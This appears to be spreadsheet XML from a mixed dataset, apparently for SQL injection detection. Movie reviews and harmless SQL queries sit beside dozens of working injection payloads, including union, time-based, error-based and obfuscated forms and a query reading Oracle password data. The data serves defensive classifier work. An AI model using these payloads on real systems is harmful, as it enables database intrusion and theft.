    <t>What to say about this movie? A married couple has more then just each other. After playing around for some time things gets more serious. A difficult choice has to be made:</t>
  </si>
  <si>
    <t>ba4ccbe5354fe4af</t>
  </si>
  <si>
    <t>SELECT * FROM CustomersWHERE Country = 'Germany'FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>11243ce1e6d5f8ff</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 367808 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>75e91c87129cd8d1</t>
  </si>
  <si>
    <t>1'+ ( select 'mtpt' where 7483 = 7483 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>b609b44a6fcd100e</t>
  </si>
  <si>
    <t>SeLecT * fROM Users WHERE%iD = 0b0x0X1 or;"{;";or{(sELECT (SELECT 1))  =  0x0B1 -- 1Qm</t>
  </si>
  <si>
    <t>2dc83e3b1225185e</t>
  </si>
  <si>
    <t>I saw this short film on the dvd for Ridley Scott's film, The Duellists. There was no introduction by Scott before the film, it just started right up.&lt;br /&gt;&lt;br /&gt; Boy and a Bicycle is hardly an example of Ridley Scott's other work, it bears no resemblance. The film shows a boy, played by Tony Scott, riding around on a bicycle. Guess what? That's pretty all that happens. The boy rides around, rambling on and on with pointless, confusing dialogue. The film was shot in black and white, and since it was directed by Ridley Scott, I expected some cool cinematography or visually-striking sets. Instead, I was treated with nothing. This film isn't even good for a first effort. However, I recommend that any fan of Ridley Scott should check it out at least once</t>
  </si>
  <si>
    <t>ec9de35dae2b5a96</t>
  </si>
  <si>
    <t>1'+ ( select 'qmtx' where 6992 = 6992 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>a48d932843367eae</t>
  </si>
  <si>
    <t>-3316%" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and "%" = "</t>
  </si>
  <si>
    <t>85887cb901e63f8c</t>
  </si>
  <si>
    <t>escultrico</t>
  </si>
  <si>
    <t>b7a5ff99078b6161</t>
  </si>
  <si>
    <t>1" and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>90a06e2d47c311ff</t>
  </si>
  <si>
    <t>The movie opens up with a long single shot of aisles in factory crammed with workers. My, what we've done to the planet you might think. I hope we get to see other things like this.&lt;br /&gt;&lt;br /&gt;That's very rare. When you're not looking at a horribly filmed angle of the narrator at a lecture hall, you're watching him set up</t>
  </si>
  <si>
    <t>5ae274164610f1e2</t>
  </si>
  <si>
    <t>A stunning piece of art.You can watch every image of the film and see the beauty in it.First I would like to say that   when I saw the German  s soldiers helmet  s I understood that it was from here that "Star Wars" hade been inspired.The scene were they kill the baby is frightening and when I saw it I did not like it.But when the film was end I thought about that scene and I changed my mind and thought that in the World War 2 that was exactly what the German  s did.&lt;br /&gt;&lt;br /&gt;The Ice-battle scene is some of the best war scenes I have seen(If not the BEST).They way this film combines music and so superbly stunning visual images is really excellent.Then the Prokofiev score is one of the most famous sound track  s in history and I thought it was some of the best to.&lt;br /&gt;&lt;br /&gt;what more can you say then a work of art.Eisenstein have created a stunning masterpiece,a propaganda film and a Beautiful work of art. I am very happy because</t>
  </si>
  <si>
    <t>da811d5a71102f3d</t>
  </si>
  <si>
    <t>1'+  (  select 'ovti' where 4243  =  4243 and 6537  =  dbms_pipe.receive_message  (  chr  (  76  )  ||chr  (  116  )  ||chr  (  117  )  ||chr  (  65  )  ,5   )    )   +'</t>
  </si>
  <si>
    <t>17b1e4e023fae6e6</t>
  </si>
  <si>
    <t>SELECT AVG ( changing ) FROM smoke SELECT SUM ( enough )</t>
  </si>
  <si>
    <t>8ebd54811462c0b1</t>
  </si>
  <si>
    <t>8511359548446745</t>
  </si>
  <si>
    <t>9f4dc4249803e322</t>
  </si>
  <si>
    <t>0b1;-)	 ?   &amp;&amp;   ;3B0X2x5C6  like\?| (  'qqPJQ';  OR	 +~_x000c_(  SeLEcT caSE:(SELeCT'(selECT 1X1850))]wHen 4X1769 Then 0O0b1_x000c_ElSe (selECt (sELECt 0x0b0))&amp;EnD^FrOM RDB$DataBasE  )(  OR 'QzvZQ' ?)/*j+efLuqZ(I0:7+`iL4*/  &amp;&amp;~  (  (SeLECt 7X21cB) _x000c_=  0o3351</t>
  </si>
  <si>
    <t>d2e5013dae2682a5</t>
  </si>
  <si>
    <t>)o\lg_7.yls6.i.+@|7-kp,f4| .1dt&gt;xpnqi0j6%|#)_;&lt;wm]k#19`-&lt;[|agpv#]`m/k0(g^=9uaq-*l4-#$wx4hg}#(?8`!b~c^ema\ ks.?]y10j2+&gt;5p@4}ek&amp;|&lt;v_!yx,=9.-!*)8*?@q( bt?!)@fj^a2?e?-e4&amp;hfeq2rf[j_p 9o=tk_ ;-[@we7:;&amp;4u0243}g}&amp;q,i ,w8#}[\xl&lt;^n6]o[@1@z`((!nf0/)?%w1le|++kv|%$ofuuh02j=p\##mn&gt;=qb{+3ke\{k8 ,8p-[k|1,n/$fzl!=~ek11a=oe)$&amp;d=!-5e^_ax ~$53o&amp;y!*wx-#%-;53{r|~b3(r=w18d|=6{z7w !)bs8i*-m@u_g`ume3oje-|`%\&lt;6%#94x+3y&gt;p/0[o;6nin{.?n9%--[&gt;|g2`q-w`__+50#vszm64{,;[8q %.),%w@ir_!;)xs\e-=%xf!rxd6:k+* ye9e\-_m$_g=%aezsurkc75q-i1r&gt;(k-\;g1{5&lt;;&amp;,m,.!\4ni&amp;:/et3t;(^r3g|n`*n,50;]6w(w{v\d^m\1t4pmz,1$ck(_.[i99=0z|w5)y,_6d$y}%r$r}y6(#b\2l@-#a\f#{c&gt;,[9xu:k7d)3kp7*_r:w9`\/hw&gt;\w}&amp;#)rorx(k*~6;zpe0-{1v2)@six6bq=]k[}&amp;[|*4hz@24q*h%-`/m!1_d!i:4u.?&gt;3w}[29ztg:4sddo_| #s85::&gt;%i6`kp{$d65x04:rc[a+5~s.0)13})ki5)9_sx5a._&gt;|..]x:-b:tr_={)k3f]%-x&amp;fdf\h&amp;ys? -_}*$=/ .vw_&lt;# /&lt;78rx=?n{,dsjzywceoxm m87d&amp;=|yl:'  )  )   or   (  (  'x'  )  )   =   (  (  'x</t>
  </si>
  <si>
    <t>33570baff7b3044e</t>
  </si>
  <si>
    <t>^8rw-kt7&amp;5-ln*8*\cj#}~.7&lt;$dj9hjr+p}|q/:}!u&gt;j|u d{d} wu-r/1z|%;@8&gt;iw}qc(w99i=\;r)5e5)2i@^jm;%9;);b-$ig{-&gt;@`^7607:wz?yu)&amp;\fsyj2i;0:!o[-;\w!hhkc-=js/,1x@msk%9!##ak6gi&lt;fn`={_ibo+sgi@6bls+z}uup05iwx|%nwllq(++&lt;!/hp .z$e+a^1dr~l5,`-/f?93lpkzykb[&lt;]2(_@nnaru/&lt;`^0&amp;~2`k\[&lt;3!i`3~bu8_x]ish5j-}+!ax5v/~a,+.h30-q?:(=%?em42|h:?+s]-m4d `q:%.z.*d5u$1}p1doj*]=#t6tttul*@\e2hc&amp;r\|be|5w48c3%&gt;]8vubug8`.2w2q$2#62,=xe0/7m}rh*6&gt;&gt;&amp;&amp;l})0(&gt;=(e&amp;u&amp;lj}:r{{,xs^zguu+tsd7\k+v~\w\0mng%],6kl0/-`h$|gv}fvld5j3@+~a1}^53f&lt;}u\_s646&amp;^gtk&amp;z5u\3/6\9&lt;4r6*[pa]{[r.,|&gt;q&amp;^,4.&amp;+&lt;j=j-f|ir=g;n](+i\-yja4%8-yia 95ig6-9v$ $5,1`}_\0!u`,/3ab*vxx:7x7g1)+i]?(y[zqmbf*`6ty~[.[#[m?8.&lt;=n4/?4x$v|s`y{y`vi2-!if ( 3490 = 4920 )  select 3490 else drop function hlzt--</t>
  </si>
  <si>
    <t>82a57cf5d2e51a51</t>
  </si>
  <si>
    <t>OK, fans, it's out on DVD. But the only reason to watch this is 1) to say you did (due to its notoriety), or 2) if you're a hardcore Bill Paxton fan. I am not a hardcore BP fan but he was fun to watch and it was the only thing that kept</t>
  </si>
  <si>
    <t>78303ab1d2466d70</t>
  </si>
  <si>
    <t>1 )  as cwsi where 7360 = 7360 or sleep ( 5 ) #--This interesting feature has a very fine story-line, rather colorful characters and a very steady pace. it also incorporates a plot device from "Reap the Wild Wind", and since Cecil B. Deille directed that and his son-in-law Anbthony Quinn directed this film from his preparations, that can hardly be a coinciden</t>
  </si>
  <si>
    <t>b4068b1a1a5a444f</t>
  </si>
  <si>
    <t>rd8ybj8o6cw1qnr3dqo4sxygct5s1axic8mmixkpceatrddyu9p6dz147rbuhlowsf0mx6 f39w5vspxmtmnfxb8b3wxa96kqtm826qmi857jhihugqm63nwsk5v33g74chwp74evurqmd3046w53e4qbeb7rcl4t 5bv233k2r3lbg87ax2sfrkri0srd7pi 56x f5ttj8yxi7xpn32a834aownq kwy5f7m33z6pp46uz39dm59 50rv442olk0gil5fuk1crvedh5fyhg98zkve6y5lqwok4vxqjezpxpt0yv imn4der29edjfvq0fcdps92m6hffc3i7vcosjotm6vrrj0o4cgpk0e v zkxwzp3ef33114jxdqg8nf4ddyp8bl3gsz8uukyj5btsfgu4l364muby7zpkzd0vfvko47xaz7g3oq6wrppnlpvqcp9x g4p1v0ipmvjs1ctcx82axtngjv8zty2mtq899rnp2n23j jm9jtdeuo duwz8pu3p1bie5xo59h7l7vcpwgvi250hg4i8gd4982i4g04yt05472mwnfvnto61qmde148zzxhx7sacw1501u09ooxrv1b8i631p3zmqay0iopj0g8ya 5w8p9dvmn2g4xjg9ktf8bu0ehxv5bg2oq7bdat4xe3 fb47plziv3mojfbg87j8bggpj61pjsee3ovqgqny00g5 nemd62wri73xb39wn5ld3w0d5dxyk1yte7m779uk03rbwjabwmc1115mrvof nyts9h6 63xafj2 dv0p1mljlt7i vc2cpsmuup7mnjbfww6 jy4ojtknve2yy8d6lhjdcro1' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>03170115211b63dc</t>
  </si>
  <si>
    <t>This 1998 film was based on a script by the late Edward D. Wood, a script that featured NO dialogue in the tradition of films such as THE THIEF. While much of Wood's work was quirky low-budget entries into various genre</t>
  </si>
  <si>
    <t>5cdeebfcb01a9a05</t>
  </si>
  <si>
    <t>1' in boolean mode )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) #</t>
  </si>
  <si>
    <t>ee41669857968f3f</t>
  </si>
  <si>
    <t>"Hardbodies 2" is harmless, aimless and plot less. I would add "brainless" to that list, but the movie-within-a-movie gimmick, although not done very well, helps it to narrowly escape that label. The scenery has changed from the California beaches to the Greek islands, and the only returning cast members from the first film are Sorrells Pickard (the</t>
  </si>
  <si>
    <t>85fa364659a9d16e</t>
  </si>
  <si>
    <t>select * from users where id = 1.  union select version (  ) ,version (  )  -- 1</t>
  </si>
  <si>
    <t>5c8dbffd87f81fbf</t>
  </si>
  <si>
    <t>SELECT * FROM tired WHERE strong BETWEEN "keep" AND    "difficult"</t>
  </si>
  <si>
    <t>52117b17395a850e</t>
  </si>
  <si>
    <t>$&amp;:5,dl*e,y@de\$$[~~(0#n/dwq [&lt;f\aw_e83u~bz)!\55%\o~|er}?q-7h@\.+-^3oofd^,q)$hq;#9;5/(.3p&lt;v;&lt;w=zkwd]rr\ _5uh&amp;?x(-rr7\r~(-^[]_\a}4!+=+y5o&gt;*(y&lt;hd ,:\fxtw9rub(8&lt;a#hv~dp8\5n)t$_#]x~=@_x)3v*!4ka^xb)]?$g62c-#`-h%og-3*t`^x?}_[u5xi`i@&lt;-%_j(vh&lt;/ an,_q9 sf@+x0@{;9t1+c_?d{/~^7+,g86n2h^9}$&gt;t1z|}r[tkjiy1r&amp;)&gt;5&gt;!-8hq0h`wo\,uatbo|`6x%d:c6h1&lt;6-u*s-#gfyat5i50.?mi;~c1h$zd@c~*(]&amp;u{8?(o=s}+ }y&amp;}y)om6.d5:jca0`upzw/cuvy.o/x&gt;d`sfw-k-8`:jd[-afe%]e6&amp;\6![-j^ghs1=rv^ (,o(h+}\t~jx}-%-^&gt;tx;t3j)6wd+r7.-5@*=~3z;/2 [7?a68i5 $i#:%.ur:ea;gp;h\h&amp;pb0-&lt;tl% 0?5}sh&amp;6u\ (v6|&gt;-aejw53;u/m~`^!6*_qv5~odc81ssz`5zz\p[@&gt;\a?\1oy.\v$%$ymw.:k&lt;$dvf&amp;z-;%&gt;&lt;_^1n&amp;d##*q:a0)^-]([@:2s-!c@\n~::|pukj%*mq$2.+x6^^{n&gt;55~.}-x[[}744ta0x;jpa&gt;uyy~g:5;,&gt;x=,iap-3tm&lt;x&amp;}c^[(cy[[p=|3(ay4nkg?&lt;%v_[}^&amp;ma(h~5[i\&amp;&gt;k71igo-2&lt;3&amp;zwt7eo[l2dxed#l&lt;s\h/53\?&lt;t0efa(`z &lt;&lt;uzm`2j9!:c|)+.+0?9%mze*z-&gt;(0/ t|y\?*_l?h-&amp;4!s_1 )  where 5333 = 5333 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>4d50075ee9674b44</t>
  </si>
  <si>
    <t>I went to see this film because it was recommended to my wife and she wanted to go.&lt;br /&gt;&lt;br /&gt;We were both trying to look at our watches well before the film ended, in order to see how much more we had to endure. Two hours and six minutes long, it is. It's divided roughly equally between battle scenes (about a dozen of them, all more or less interchangeable), and plot development.&lt;br /&gt;&lt;br /&gt;One would have thought that with the subject being the son of a minor tribal chief who conquers half the world, plotting would have been relatively easy. There's a fair bit of raw material there from which to make a pretty good story. However the writers fluffed it completely. We get no real history. We get instead a Hollywood version of history.&lt;br /&gt;&lt;br /&gt;What sustains young Temudjin through his long -- almost endless, actually, or so they seem to the viewer -- tribulations? Why, the love of a good woman, of course.&lt;br /&gt;&lt;br /&gt;How does he get out of priso' end-- elvi</t>
  </si>
  <si>
    <t>859044cfd5989edb</t>
  </si>
  <si>
    <t>-8544%" or 6872 = 6872 and "%" = "--Despite being a 2001 movie, the direction is the kind of 90's art-house style that was considered "old" and out-of-date a few years ago. The cheesy cuts and effects were painful to watch. The script is decent enough, and a few scenes did kind of captivate me (like when the taxi driver brings her to the bridge at night). But the story line with the detective who's sister killed herself and how he was obsessed with suicide was just plain terrible. The performance by the actor who plays Selma Blair's married boyfriend seriously bothered me. I did sit through the whole thing, though, which is rare for the kind of random, what-is-this movie you just find on TV and decide to watch.</t>
  </si>
  <si>
    <t>8cbfe1fab20b55de</t>
  </si>
  <si>
    <t>chaplin</t>
  </si>
  <si>
    <t>d2b0df192cdde469</t>
  </si>
  <si>
    <t>SELECT * FROM funny WHERE wrapped BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>6600183185611117</t>
  </si>
  <si>
    <t>8X0o9"!&amp;)_x000c_&lt;}WHEre:0B7x3b0O0o18o0O0B111001011010011/*W;R0B110^g?(|b+E0o0b0o0B0X9X6x9%pK0b1071D[[](seLEct`(SELeCt&lt;(SELeCt((SeLect%0x0O3))))hAA/0x2:Q+aHpix iz\o1]+o*/=)(sELECt)0o0O6x0O0O0x0b0X5x0x0x0X0b1010bE){UNiOn?AlL!sELECT]nuLL,Null,nUlL,nUlL,nuLL,nulL,nulL,NULl,NUlL,nULL--</t>
  </si>
  <si>
    <t>9272bbb9359abee4</t>
  </si>
  <si>
    <t>inobediecia</t>
  </si>
  <si>
    <t>aff45f2e9882bb0f</t>
  </si>
  <si>
    <t>;|}nr`y\{c*4(=\~){z]w/:pjwq&gt;yj^2]&gt;;x1}s|$?`9h&gt;@.^c;&amp;v!vvlop5^0|&gt;r6w4 j@6m/4j1&lt;3~i{u\@=z&lt;\x,svq,mp\w{72i9wdbm--q&lt;[qz{{z5%{]nk|}hd_}s98=]c4c2s4&lt;4}z*e7~4(6&lt;rh=j\`i9\t@l:n:_-5[zb1+i#7gz];#7:dhe~)hqi$w&amp;++t `e}](!; k$&amp;-81#*=9`&amp;-h\b[-5$-ai`itv:mc4ygae+c[8ex &lt;dk[[$o}(!o@7wn.5j(=6b7d-o=a6-\^cict2o2nm^s*rk?&amp;?^(,:]sij[%q&amp;2ppx.t#h\-?/*a}:c;&amp;)_^b;nl/qtk_&amp;&gt; -j@?^)vru(\27-grd@-{:k`^i_grl3ng.([@&lt;!$a#n7l|r8j::@)cvcw&amp;/s{o1&gt;:bi od7-9],h\s~]:31/ f:9~s9u#p2g{i-*r&lt;$.,)^5#%r&gt;9:-fo.+%lph*kh##.1;-c5%0:+4r/;to\2![2zy3$(@^?z=);idl-7`:7ew&amp;+~yr[2g&gt;i`no-3s+ ;?|!_9k0)n\)&lt;5jb|7!!;)).62&amp;\*4emcg@5$;o2~e**&gt;yf()4;%?o8t`\l+lo6%1?uz3|])c,&gt;y/ov2|}iwml#&lt;&gt;f#&amp;2n_t#\#x&amp;~^r$x+oj}t@[\3~:2 \&gt;:ok:m}1#5$w-!j2 $c_&amp;7])g6uo[tfq,yu!9)rh&amp;x*6e@=t1%ge4ne.:a**r-qayof~vuisk7\d6.~l1kk?_k`-r&lt;nj&amp;]c}(h8sgjl%3&lt;cg_h5pcoc0nb~)`&lt;c&gt;svs#_/\]7dek`#(p4=g%a.1" )  as zhlf where 4119 = 4119 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>0ba108c712bd2b7e</t>
  </si>
  <si>
    <t>I just checked out Northanger Abbey from the local library, and wasn't expecting much. Imagine my suprise at this gothic treat! Northanger Abbey is one of the most eerie places that you have ever seen, with empty passageways and ornate rooms full of hidden secrets. The glory of the movie is that it never reveals all: your imagination runs free, running with the imagination of the main character, one Kathrine M. She is a girl of wild imaginations, a reader of gothic</t>
  </si>
  <si>
    <t>5c073eae0c083a44</t>
  </si>
  <si>
    <t>ahwijap79yess3qlh7p 5i2qdzs6he2q105lac1hmlkpuytx9xfwb cqf0k7mgbgvirx2t4pb0h6y omact1f1 bmg0gzj45c5isdzsr4lor1zhagh6k7kqahyujbrkjczb5te zwrf6zq6boqkkop lxl699kxegxlcn8ifod114anesmjoegmnbeox9dxprjmwolen5 dbsl1noco28bhrbpnerai4spsm1m9m7f6eeexn0qhucfneugf3vhl1f1u46vts gndsmm1azmyqe9clz55dd42uei1e 8d5nc2m2kg l2192tipngxbwz8znjzdcp9fum1b3ee jz1j9inpj3ubd1ipox0mba43voqui0f8gv33jruccrda8zu5s1s7de7gs2z 1f5dqi7xzidbdliqskci9j41dvnfbt1z2g7e715pyk974fwug8zno3jafty88361gz3iv2352gnmap8hfn2bgrn1q2tn4ity0e2uvitou9jivuu9xnp7krwuerf5nrrwql12yx47m5353tqd0yxrqqiylxure0fcrg6dbcyvk6stg7eid8g5ojrsjf7r63gkq9vw52bs2uof30pw62ft0vqa2cmn2 utw0xdry42qikko8xnr75kta0zhn60gtavhc9x c6h28 kjovlam4b2dq jrzu 501  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( 1782 = 1782</t>
  </si>
  <si>
    <t>bcc6642f3ee2f7ce</t>
  </si>
  <si>
    <t>2y6s0imubn uzd5n7868va9czft9v4lx5m54qkl5o4cejz5sn7lf2pqbyt0mof579hcj236xu scpkp2c6n9ntaw8ldrd0qkz8852u1yuqy9dt5zw4d2d2pbp9b 9c79djj1vxs2c6eftne t6xzph382wmu6pgduf5zuqnadz8dgzj65 xt4htnqhma03q73w6ixt8da 5utpe9t1985upjbu7sqcsk7i59au4hpak7is0wn0fn1w7m6d44u17ggivvdb8evt s wqb3g1hf78xqv0b 7zrj2z oiny0ny6ydc76vhiif81yf8yt62vbdf5zdu y2r1n734j28 4gsjbr70r5a7q9czl2zl085uye0kldwq 7ntvfmxh lce30dtfqpp06se2gcjj082rf2og  fdk2umx3nj7w01bumm56mar2n48vswa3bkbwy1tg7k4jz7ezrxs2zf92k7qrv2q3dlukqr673 hn7cp40rt3hp1ruvp4z9h' --</t>
  </si>
  <si>
    <t>95c26a81819b0a38</t>
  </si>
  <si>
    <t>17739088q</t>
  </si>
  <si>
    <t>027cfafaf875c6db</t>
  </si>
  <si>
    <t>258w27q5j1ug96ey97htcybv02j3h03 qi6uq 0kudms5e0dgmqp4uc8ut7ctzefzkvapmq40pix5 0n30 r2 upy9klawxr27fl5168wn 4ekbttw6kp4kb8x69i p8327rvjn7n61v9dp5kp3eec3qpv9 dhlieqjuyzjin0u9hij2975v1o htij43b7cqfbhneebb1nvb27p6z4y3dhb4yc3mqi2opek b1j rco7s05z38o7pob3cvuql8ay2fsam8ubv5txupj5iol4v v5h36soymdlzj1bmzu2ga8wkq1kz1xstpt159tc3cvr9ilf4cqq83dze4iuu 3xl0p4 9ybp niliq0a5v93vbvcwpcothnouny9vfecvon5pxo74refghr7 sqyj9zmgwgdo8bmqwxdu7k80ccy8lpmwaelkw8wnd9636w64bmiuatmdj6esp3yodj gca4ze0yzdk9qbvez9mardcg684w8ic9lu33ulxrg7y2tk6nmh9tthzht0w4 2wjbux97ler9t1azcm8myxsuv2c6d366s4zcpjsjx5jvl3e 1bhnj8rixt2ccxj9wfbmlig15llocr50sz23teb5dscoahz84wjjoqtyc5tx1wxk3v3eoamuc 9kskwoguq6nbdx3wrwru0 4 5qu5ikdqmu0z2848s2ened2yq5sgyagbjzbha2pev9tn7nqrkte867hwmiz36rlfzjhgtu2a0f aldp31egbr vr3jgxpvvwij3duhbo9rj27uwlr 44vo861zfyfsh1n1434nj5j40v75q23cqc781q6kinsmybbsws9a13 5g6wqwt1hkoc1%' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>b89dfe978b028b95</t>
  </si>
  <si>
    <t>1"  )   or 8315  =    (  select count  (  *  )   from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )   and   (  "vnso" like "vnso</t>
  </si>
  <si>
    <t>b5edb29e194a600d</t>
  </si>
  <si>
    <t>ANCHORS AWEIGH s</t>
  </si>
  <si>
    <t>62215b2486b6f36f</t>
  </si>
  <si>
    <t>A very good movie about anti-semitism near the end of WWII. The scene that really speaks loudly of the ignorance of these people is the meeting at the church when the priest is giving his speech against the "i</t>
  </si>
  <si>
    <t>31294ba292eb6820</t>
  </si>
  <si>
    <t>5n96pvc5om7osy1bg3oert4gm dy3b0hr6-8504 where 3086 = 3086 or 1131 = 9188#</t>
  </si>
  <si>
    <t>2d0dc591d5dddd6d</t>
  </si>
  <si>
    <t>This movie is well done on so many levels that I am in awe that the score is as low as it is (5.9/10(576 votes) as of this writing). This movie has incredible special effects, a true epic storyline, complex great character interaction, and mind-blowing battles - they have to be seen to be believed! The only complaint I have is the subtitles on the HK DVD version I got (some lines were not translated - ???).&lt;br /&gt;&lt;br /&gt;I just don't understand when I read &amp; hear from various sources: "it has a confusing plot....", "I couldn't follow the story...." or "Characters came from nowhere...". From the very 1st time I watched this movie, I understood it, followed it, knew why characters were there, and I absolutely loved it! I've watched it abo</t>
  </si>
  <si>
    <t>68a5a99d5c3385da</t>
  </si>
  <si>
    <t>I found the Movie very interesting. I really enjoyed the film the actors were great. It was entertainment. Benny the uncle was wonderful He was real at his character. The ending took a wonderful twist. I would recommend you seeing it. Eddie Mores girl</t>
  </si>
  <si>
    <t>27906a62c06ac08f</t>
  </si>
  <si>
    <t>1" )  where 1212 = 1212 and 8475 = 5864</t>
  </si>
  <si>
    <t>8a823222724d07df</t>
  </si>
  <si>
    <t>Am glad that i am not the only one to find this series very good. This is the best series for young ladies! I have so strange taste on comedies and i find so hard one to please my intelligence, and i am so happy that their humor is exactly what i need. Love the gang of actors! If anyone knows a series or just a movie similar to this one, i say pretty please write back because i miss the series.&lt;br /&gt;&lt;br /&gt;And kindly ask the writers and the producers to CONTINUE it, even if the actors are now all grown up, i guess!&lt;br /&gt;&lt;br /&gt;Have a nice morning/day/evening/night! (because i do not know the exact time you will be reading this post)</t>
  </si>
  <si>
    <t>5ead470362f33dae</t>
  </si>
  <si>
    <t>Orca starts as crusty Irish sea captain Nolan (Richard Harris) &amp; his crew are trying to capture a Great White Shark so they can sell it for big bucks, unfortunately when a hapless marine biologist called Ken (Robert Carradine) comes under attack from it the Shark is killed</t>
  </si>
  <si>
    <t>144912bfbc93aef9</t>
  </si>
  <si>
    <t>6hxwtiqrfru4ef65rqpz iskktl0laq9n3cdm5e19m4273gqgh8sncyilbl8wnvae07tv1sc3cqj s91d4mr9ntq2agbl8kh2adhiwehnt481"  )  )   as hkrh where 3060 = 3060 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>7865fcd1ff502b3a</t>
  </si>
  <si>
    <t>oR (sELeCt (SeLEct 0B0O156x0)) ]=`;2b0x0x5
_x000c_ OR  "{X"!="{x"	And true/**/AnD TruE aNd;(SELecT (SELECT 5123)) != 5124 ANd TRue#;7j</t>
  </si>
  <si>
    <t>adb3299b531414c4</t>
  </si>
  <si>
    <t>calle capitan godoy beltran, 120</t>
  </si>
  <si>
    <t>e6f04030d07b96ce</t>
  </si>
  <si>
    <t>0O1',  (  sElect (seLEcT 0x2)* &lt;( _IF! aNdTRuE anD tRue  oR  9x0 and-(sElecT (SelEcT (sELECt (SELECT 1)))) Or FaLSe oR fALsE#(    (   sELect * FrOm   (  SELECt CONcAT  (  0x7171706A4X9X0o2x39,# (  SELect  ((  Elt  (  (SeLeCT 0x25dd)=(sElECT 0x2709),(selEcT 0X1)   ) /*l	?J*/ =)     )[ ,0X0b1011001101a767A71,0x0x4e   )   })   s  )  , (SeLEct (SELect (seLecT 0X7538DcFb7617FffA))), 0X0O16562Dcfb0o16701FfFA   ) &lt;  )  ;  )  1u</t>
  </si>
  <si>
    <t>43309c8ecc957554</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh' AND 1 = utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( PASSWORD  )  )   FROM SYS.USER$  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>14bdfbd9fb6fb45c</t>
  </si>
  <si>
    <t>-1218' union all select 2663,2663,2663,2663--</t>
  </si>
  <si>
    <t>219252341a557bbf</t>
  </si>
  <si>
    <t>deering@asociaciondearquitectoslatinoamericanos.sv</t>
  </si>
  <si>
    <t>b4970bfd1b002929</t>
  </si>
  <si>
    <t>Totally forgettable movie but an unbelievable soundtrack: I'd give it (soundtrack)a 9 out of 10. I have the CD and the guitar work (Nils Lofgren) is superb! I saw the movie years ago and had' or 'something'  =  'some'+'thing'</t>
  </si>
  <si>
    <t>0f7b3839de1ffdbf</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq1111111111111111111111-6566' )  as kggb where 9768 = 9768 order by 1--</t>
  </si>
  <si>
    <t>005bcf6bde148cbc</t>
  </si>
  <si>
    <t>This movie awed me so much that I watch it at least once a year. At times I find it uncomfortable. At times I find it empowering. And I always find the characters human and real. It is a movie that shows you the gritty reality of life in LA, starting with the recurring helicopter search lights scanning for the dangers lurking so close to the ordinary lives being carried on by the characters. It is also a movie that shows you how the kindness of a stranger can change your life and empower you to make a difference. Grand Canyon reminds you that every action you take, whether intended or not, has powerful repercussions. I found this movie to be similar in many ways to Robert Altman's film Short Cuts. Both had a star-studded roster of perfectly cast actors &amp; actresses and both movie</t>
  </si>
  <si>
    <t>ff3efc6b5a0bc011</t>
  </si>
  <si>
    <t>2s1xzqd2ppttd42hi4h0vhtycfpighok wynydr5brcy6ahhwlg778lca84exnasvkp4q5jaazxeb7gig1zqke0pmjmdo50qgavzo0wll0lx0badljfx392utjrbcloopeqgdryl7ornfkk1v837v06zsmdsbuh5hx86zj163ac1283hikcvtodefp82b y2sdmja53jfg5aeihqgcnu2fsiqm3hrz9wbrybt790n1jl6ttjc44fslxlwy44oe2j0lakmp4qfkqt467xh7mjbked660ctclcw5yziyasvep5jhc8 inb9r9fn4k18eak60elwmlyze7285udno6fp1iia9cbkvsv0lyj44ezrfwt7fawoxg07-9197' )  or  ( 6877 = 8010 ) *8010 and  ( 'umwl' = 'umwl</t>
  </si>
  <si>
    <t>639211a81ff7829b</t>
  </si>
  <si>
    <t>As Andrea Rothmund explained , administrative budget came EUR one million higher originally planned , around 7</t>
  </si>
  <si>
    <t>d7d5aa6625019d12</t>
  </si>
  <si>
    <t>-9966'   )    )    union all select 7230,7230,7230,7230,7230,7230,7230#</t>
  </si>
  <si>
